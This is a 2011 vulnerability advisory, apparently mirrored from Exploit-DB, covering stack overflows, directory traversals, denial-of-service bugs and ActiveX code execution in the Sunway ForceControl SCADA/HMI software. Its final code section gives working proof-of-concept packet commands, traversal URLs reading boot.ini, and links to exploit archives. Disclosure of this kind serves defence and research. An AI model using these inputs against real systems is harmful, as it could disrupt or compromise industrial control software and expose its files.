sunway ForceControl 6.1 sp3 – Multiple Vulnerabilities

  • 作者: Luigi Auriemma
    日期: 2011-09-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17885/
  • #######################################################################
    
     Luigi Auriemma
    
    Application:Sunway ForceControl
    http://www.sunwayland.com.cn/pro.asp
    Versions: <= 6.1 sp3 with AngelServer and WebServer updated
    Platforms:Windows
    Bugs: various stack overflows
    directory traversals
    third party ActiveX code execution
    various Denials of Service
    Exploitation: remote
    Date: 22 Sep 2011
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    ForceControl is a chinese SCADA/HMI software.
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    -----------------------------
    A] AngelServer stack overflow
    -----------------------------
    
    Signed comparison in packet 8 of AngelServer that leads to a stack
    overflow:
    
    004022E1 > B9 19000000 MOV ECX,19
    004022E6 . 33C0XOR EAX,EAX
    004022E8 . 8D7C24 24 LEA EDI,DWORD PTR SS:[ESP+24]
    004022EC . 83FE 64 CMP ESI,64 ; our value
    004022EF . F3:AB REP STOS DWORD PTR ES:[EDI]
    004022F1 . 0F8D E7000000 JGE AngelSer.004023DE; signed
    004022F7 . 8BCEMOV ECX,ESI
    004022F9 . 8D75 0C LEA ESI,DWORD PTR SS:[EBP+C]
    004022FC . 8BD1MOV EDX,ECX
    004022FE . 8D7C24 24 LEA EDI,DWORD PTR SS:[ESP+24]
    00402302 . C1E9 02 SHR ECX,2; memcpy
    00402305 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    00402307 . 8BCAMOV ECX,EDX
    00402309 . 8D4424 24 LEA EAX,DWORD PTR SS:[ESP+24]
    0040230D . 83E1 03 AND ECX,3
    00402310 . 50PUSH EAX
    00402311 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    00402313 . 8B8C24 A0000000 MOV ECX,DWORD PTR SS:[ESP+A0]
    0040231A . E8 A1FDFFFF CALL AngelSer.004020C0
    0040231F . E9 BA000000 JMP AngelSer.004023DE
    
    
    --------------------------------
    B] WebServer directory traversal
    --------------------------------
    
    Through the usage of a 3-dots pattern it's possible to download the
    files located in the disk of the project used by WebServer.
    
    
    --------------------------------------------
    C] various Denials of Service in AngelServer
    --------------------------------------------
    
    The AngelServer program is affected by various problems that lead to
    Denial of Service effects:
    
    - exception handler due to unallocable memory through packet 6
    - invalid memory read access during memcpy through packet 6
    - whole system reboot through packet 6
    - endless loop during the handling of the interfaces through packet 6
    - whole system reboot through packet 7
    
    
    -------------------------------------
    D] third party ActiveX code execution
    -------------------------------------
    
    This software is bundled with the "Cell Software"'s YRWXls.ocx ActiveX
    component (BD9E5104-2F20-4A9F-AB14-82D558FF374E version 5.3.7.321 which
    is the latest) and it's affected by a vulnerability in the Login method:
    
    eax=886641aa ebx=02c55aac ecx=015ebd5c edx=886641ab esi=886641aa edi=015ebd88
    eip=02c01db2 esp=015ebd10 ebp=02c867c0 iopl=0 nv up ei ng nz na pe nc
    cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010286
    YRWXls!DllRegisterServer+0x2ab62:
    02c01db2 8a08mov cl,byte ptr [eax]ds:0023:886641aa=??
    0:008> gn
    (a1c.e00): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=6ed9b6fc edx=7c8285f6 esi=00000000 edi=00000000
    eip=6ed9b6fc esp=015eb948 ebp=015eb968 iopl=0 nv up ei pl zr na pe nc
    cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
    6ed9b6fc ?????
    
    No additional research has been performed on the vulnerability, anyway
    in my test it's necessary to load any other unsafe ActiveX component
    first (tested on Windows 2003).
    
    
    -------------------------------------
    E] stack overflow in SNMP NetDBServer
    -------------------------------------
    
    Stack overflow caused by the copying of data chunks in a stack buffer:
    
    0040303A|. 66:8B40 0A MOV AX,WORD PTR DS:[EAX+A]; chunks
    0040303E|. 0FBFC0 MOVSX EAX,AX
    00403041|. 3BC7 CMP EAX,EDI
    00403043|. 0F8E AC000000JLE SNMP_Net.004030F5
    00403049|. 894424 14MOV DWORD PTR SS:[ESP+14],EAX
    0040304D|> B9 10000000/MOV ECX,10
    00403052|. 33C0 |XOR EAX,EAX
    00403054|. 8D7C24 2C|LEA EDI,DWORD PTR SS:[ESP+2C]
    00403058|. 83C3 02|ADD EBX,2
    0040305B|. F3:AB|REP STOS DWORD PTR ES:[EDI]
    0040305D|. 8B46 2C|MOV EAX,DWORD PTR DS:[ESI+2C]
    00403060|. 43 |INC EBX
    00403061|. 8D7C24 2C|LEA EDI,DWORD PTR SS:[ESP+2C]
    00403065|. 66:8B6C18 FD |MOV BP,WORD PTR DS:[EAX+EBX-3] ; chunk num
    0040306A|. 8A4C18 FF|MOV CL,BYTE PTR DS:[EAX+EBX-1] ; chunk size
    0040306E|. 884C24 20|MOV BYTE PTR SS:[ESP+20],CL
    00403072|. 8D3418 |LEA ESI,DWORD PTR DS:[EAX+EBX]
    00403075|. 8B5424 20|MOV EDX,DWORD PTR SS:[ESP+20]
    00403079|. 81E2 FF000000|AND EDX,0FF
    0040307F|. 8BCA |MOV ECX,EDX
    00403081|. 03DA |ADD EBX,EDX; concatenate
    00403083|. 8BC1 |MOV EAX,ECX
    00403085|. C1E9 02|SHR ECX,2; memcpy
    00403088|. F3:A5|REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    0040308A|. 8BC8 |MOV ECX,EAX
    0040308C|. 83E1 03|AND ECX,3
    0040308F|. F3:A4|REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    
    
    ---------------------------------------------
    F] integer stack overflow in SNMP NetDBServer
    ---------------------------------------------
    
    Signed 8 bit value expanded due to its sign and used in a memcpy over a
    stack buffer, note that also in this case the chunked data is
    concatenable so there is also this other way to exploit the overflow:
    
    00402B78|. 0FBE2C1A |MOVSX EBP,BYTE PTR DS:[EDX+EBX]; 8bit expansion
    00402B7C|. F3:AB|REP STOS DWORD PTR ES:[EDI]
    00402B7E|. 8BCD |MOV ECX,EBP
    00402B80|. 43 |INC EBX
    00402B81|. 8BC1 |MOV EAX,ECX
    00402B83|. 8D7C24 20|LEA EDI,DWORD PTR SS:[ESP+20]
    00402B87|. 8D341A |LEA ESI,DWORD PTR DS:[EDX+EBX]
    00402B8A|. 03DD |ADD EBX,EBP; concatenate
    00402B8C|. C1E9 02|SHR ECX,2; memcpy
    00402B8F|. F3:A5|REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    00402B91|. 8BC8 |MOV ECX,EAX
    00402B93|. 33C0 |XOR EAX,EAX
    00402B95|. 83E1 03|AND ECX,3
    00402B98|. 43 |INC EBX
    00402B99|. F3:A4|REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    ...and...
    00402B9B|. 0FBE6C1A FF|MOVSX EBP,BYTE PTR DS:[EDX+EBX-1]
    00402BA0|. B9 10000000|MOV ECX,10
    00402BA5|. 8D7C24 40|LEA EDI,DWORD PTR SS:[ESP+40]
    00402BA9|. F3:AB|REP STOS DWORD PTR ES:[EDI]
    00402BAB|. 8BCD |MOV ECX,EBP
    00402BAD|. 8D341A |LEA ESI,DWORD PTR DS:[EDX+EBX]
    00402BB0|. 8BD1 |MOV EDX,ECX
    00402BB2|. 8D7C24 40|LEA EDI,DWORD PTR SS:[ESP+40]
    00402BB6|. C1E9 02|SHR ECX,2
    00402BB9|. F3:A5|REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    00402BBB|. 8BCA |MOV ECX,EDX
    00402BBD|. 8D4424 40|LEA EAX,DWORD PTR SS:[ESP+40]
    00402BC1|. 83E1 03|AND ECX,3
    00402BC4|. 50 |PUSH EAX
    00402BC5|. F3:A4|REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    
    
    ----------------------------------------
    G] Denial of Service in SNMP NetDBServer
    ----------------------------------------
    
    00402A0A|> 8B4B 30MOV ECX,DWORD PTR DS:[EBX+30]
    00402A0D|. 83F9 0BCMP ECX,0B
    00402A10|. 7C 24JL SHORT SNMP_Net.00402A36
    00402A12|. 8B5B 2CMOV EBX,DWORD PTR DS:[EBX+2C]
    00402A15|. 8B43 06MOV EAX,DWORD PTR DS:[EBX+6]
    00402A18|. 3BC8 CMP ECX,EAX
    00402A1A|. 7C 1AJL SHORT SNMP_Net.00402A36; signed comparison
    00402A1C|. 8D5403 FELEA EDX,DWORD PTR DS:[EBX+EAX-2]
    00402A20|. B9 A0704000MOV ECX,SNMP_Net.004070A
    00402A25|. 5F POP EDI
    00402A26|. 5E POP ESI
    00402A27|. 66:8B02MOV AX,WORD PTR DS:[EDX]; invalid access
    
    
    -----------------------------------
    H] Directory traversal in NetServer
    -----------------------------------
    
    Through this server it's possible to read any file in the disk where is
    located the project via directory traversal.
    Opcodes 0x00 and 0x04 are used to open the file (the first one only
    adds the full project path to the name) while 0x02 is used to read and
    send its content with the possibility of specifying also the offset.
    
    Note that there is also a very limited heap overflow caused by some
    calculations performed on the offset where is possible to allocate a 0
    bytes buffer for the reply packet but with only a Denial of Service
    effect.
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip (version 0.3.3)
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
    
    A]
    udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400
    
    B]
    http://SERVER/.../.../.../boot.ini
    
    C]
    udpsz -T -C "06000000 00000000 ffffffff" -b a SERVER 8800 0x400
    udpsz -T -C "06000000 00000000 ffffff00" -b a SERVER 8800 0x400
    udpsz -T -C "06000000 00000000 00040000" -b a SERVER 8800 0x400
    udpsz -T -C "06000000 00000000 00040000" -c "2147483647," -b a SERVER 8800 0x400
    udpsz -T -C "07000000 00000000 00000000" SERVER 8800 0x400
    
    D]
    http://aluigi.org/poc/yrwxls_1.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17885-2.zip
    
    E]
    udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff
    
    F]
    udpsz -C "eb50eb50 5700 ffff0000 0100 ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff
    
    G]
    udpsz -C "eb50eb50 0000 80808080" -T SERVER 2001 0xb
    
    H]
    udpsz -D -1 -C "8888888888888888 00010000 01000000 04000000 2e2e5c2e2e5c626f6f742e696e69" 0 -C "8888888888888888 1c000000 01000000 02000000 00000000 ffffff7f" -1 -T SERVER 2006 0x11c
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################